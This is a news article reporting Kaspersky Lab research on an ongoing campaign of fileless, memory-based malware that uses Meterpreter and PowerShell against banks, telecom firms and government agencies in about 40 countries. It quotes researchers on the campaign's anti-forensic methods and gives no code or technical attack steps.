Hackers are reportedly launching “invisible” memory-based malware attacks on banks, telecom firms and government agencies across the globe. Around 140 organisations across 40 countries are believed to have been affected by the secretive malware. However, given that the attacks are incredibly hard to spot, the actual number of infections may be considerably higher.
The cybercriminals behind the ongoing campaign are believed to be leveraging new and advanced attack methods to steal login credentials and financial data, while ensuring that malicious activities remain undetected.
Security researchers uncovered that the hackers use widely-available, legitimate software and tools, such as penetration-testing software as well as Windows PowerShell, to hide malware in victims’ computer memory, in efforts to evade detection. This attack method ensures that all traces of malicious activities are removed when the system is rebooted, making it harder for security researchers and investigators to unearth evidence of an attack.According to Kaspersky Lab researchers, US, UK, France, Ecuador and Kenya are among the top five most affected by the malware attacks.
“What’s interesting here is that these attacks are ongoing globally against banks themselves,” Kaspersky Lab expert Kurt Baumgartner told ArsTechnica. “The banks have not been adequately prepared in many cases to deal with this.” He went on to say that people behind the attacks are “pushing money out of the banks from within the banks,” by targeting computers that run automatic teller machines.
Unnamed banks contacted Kaspersky after discovering the Meterpreter penetration-testing software in the memory of their servers, which led researchers to determine the new attack method. Researchers found the Meterpreter code merged with legitimate PowerShell scripts, designed to steal admin passwords and remotely control infected machines’ systems.
Researchers still remain uncertain if the attacks are being perpetrated by one attacker and/or cybercriminal gang or different competing hacker groups. However, they note that similar methods have also been used by other proliferate cybercriminal groups such as the Carbanak Gang and the GCMAN group.
“The determination of attackers to hide their activity and make detection and incident response increasingly difficult explains the latest trend of anti-forensic techniques and memory-based malware. That is why memory forensics is becoming critical to the analysis of malware and its functions,” said Sergey Golovanov, principal security researcher at Kaspersky Lab, ZDNet reported.
“In these particular incidents, the attackers used every conceivable anti-forensic technique; demonstrating how no malware files are needed for the successful exfiltration of data from a network, and how the use of legitimate and open source utilities makes attribution almost impossible”.